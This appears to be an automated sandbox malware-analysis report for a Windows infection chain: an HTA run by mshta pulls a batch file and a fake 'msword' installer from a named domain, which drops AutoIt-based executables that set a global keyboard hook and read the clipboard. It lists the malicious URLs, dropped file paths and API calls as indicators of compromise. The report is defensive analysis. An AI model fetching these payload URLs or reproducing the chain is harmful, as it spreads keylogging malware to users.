Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: msword.exe.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: msword.exe.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: msword.exe.12.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: msword.exe, 0000000F.00000000.1983404976.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.12.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000000.2031404136.0000000000345000.00000002.00000001.01000000.0000000F.sdmp, CineBlend.scr, 00000024.00000000.2043279107.0000000000C05000.00000002.00000001.01000000.00000011.sdmp, CineBlend.scr, 00000026.00000002.2207796364.00000000006A5000.00000002.00000001.01000000.00000011.sdmp, Prostores.com.19.dr, Metallic.15.dr, CineBlend.scr.28.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.12.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: msword.exe.12.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: mshta.exe, 00000000.00000003.1984704836.000000000A3BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1990413296.000000000A3BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: cmd.exe, 00000021.00000002.2040261379.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.cX
Source: mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/6D
Source: mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/MD
Source: tasklist.exe, 00000015.00000002.2022551965.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2021952305.0000000002DBF000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2022018394.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2
Source: tasklist.exe, 00000017.00000002.2028417188.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028054246.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084148337.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084304849.00000000034D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038437182.0000000002650000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038464113.000000000267B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040494618.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040183078.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp, c2[1].bat.0.dr	String found in binary or memory: https://myguyapp.com/W2.pdf
Source: msword.exe, 0000000F.00000002.1999832718.000000000074E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf.
Source: msword.exe, 0000000F.00000003.1999229661.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999832718.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMA
Source: cmd.exe, 00000021.00000002.2040261379.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=TTCBKWZUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPRO
Source: tasklist.exe, 00000017.00000003.2027408299.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2027282495.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028472272.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfl~e
Source: mshta.exe, 00000000.00000002.1987968160.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1988750902.000000000316F000.00000004.00000020.00020000.00000000.sdmp, c2.hta	String found in binary or memory: https://myguyapp.com/c2.bat
Source: mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.batEH
Source: mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.batEK
Source: mshta.exe, 00000000.00000003.1986911555.000000000A4A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.batM
Source: mshta.exe, 00000000.00000002.1988431271.000000000310E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.bata
Source: msword.exe, 0000000F.00000003.1999229661.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999832718.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.z
Source: mshta.exe, 00000000.00000003.1984704836.000000000A42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986859763.000000000A9D0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2000214763.0000000002300000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999832718.000000000074E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999815471.0000000000730000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2022501702.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2022018394.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2022607509.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2022123246.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2022446561.0000000002D20000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2027408299.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2027282495.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028472272.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028417188.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028054246.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084148337.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084304849.00000000034D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038437182.0000000002650000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038464113.000000000267B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040494618.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040183078.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip
Source: msword.exe, 0000000F.00000002.1999832718.000000000074E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipF
Source: cmd.exe, 00000021.00000002.2040183078.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=TTCBKWZUSERDOMAIN_ROAMINGP
Source: mshta.exe, 00000000.00000003.1987593680.000000000A3EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1990980601.000000000A3EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984704836.000000000A3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com0
Source: Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: msword.exe.12.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CineBlend.scr.28.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

15_2_004050F9

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		36_2_00BAF7C7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		38_2_0064F7C7

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00BAF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

36_2_00BAF55C

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

15_2_004044D1

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BC9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		36_2_00BC9FD2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00669FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		38_2_00669FD2

System Summary

Drops large PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File dump: msword.exe.12.dr 524295939

Jump to dropped file

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00BA4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

36_2_00BA4763

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B91B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

36_2_00B91B4D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	15_2_004038AF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	36_2_00B9F20D
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	38_2_0063F20D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DischargeFlowers
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\StartupDecision
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\GazetteUna
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\PerfumeDiscussions
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\HospitalityCelebrities
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DrawnScanner
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\PdasSalaries

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_0040737E	15_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406EFE	15_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004079A2	15_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004049A8	15_2_004049A8
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B58017	36_2_00B58017
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B3E1F0	36_2_00B3E1F0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B4E144	36_2_00B4E144
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B522A2	36_2_00B522A2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B322AD	36_2_00B322AD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B6A26E	36_2_00B6A26E
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B4C624	36_2_00B4C624
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BBC8A4	36_2_00BBC8A4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B6E87F	36_2_00B6E87F
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B66ADE	36_2_00B66ADE
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA2A05	36_2_00BA2A05
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B98BFF	36_2_00B98BFF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B4CD7A	36_2_00B4CD7A
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B5CE10	36_2_00B5CE10
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B67159	36_2_00B67159
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B39240	36_2_00B39240
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BC5311	36_2_00BC5311
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B396E0	36_2_00B396E0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B51704	36_2_00B51704
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B51A76	36_2_00B51A76
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B57B8B	36_2_00B57B8B
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B39B60	36_2_00B39B60
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B57DBA	36_2_00B57DBA
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B51D20	36_2_00B51D20
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B51FE7	36_2_00B51FE7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F8017	38_2_005F8017
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005EE144	38_2_005EE144
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005DE1F0	38_2_005DE1F0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0060A26E	38_2_0060A26E
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005D22AD	38_2_005D22AD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F22A2	38_2_005F22A2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005EC624	38_2_005EC624
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0060E87F	38_2_0060E87F
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0065C8A4	38_2_0065C8A4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00642A05	38_2_00642A05
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00606ADE	38_2_00606ADE
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00638BFF	38_2_00638BFF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005ECD7A	38_2_005ECD7A
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005FCE10	38_2_005FCE10
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00607159	38_2_00607159
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005D9240	38_2_005D9240
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00665311	38_2_00665311
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005D96E0	38_2_005D96E0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F1704	38_2_005F1704
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F1A76	38_2_005F1A76
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005D9B60	38_2_005D9B60
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F7B8B	38_2_005F7B8B
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F1D20	38_2_005F1D20
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F7DBA	38_2_005F7DBA
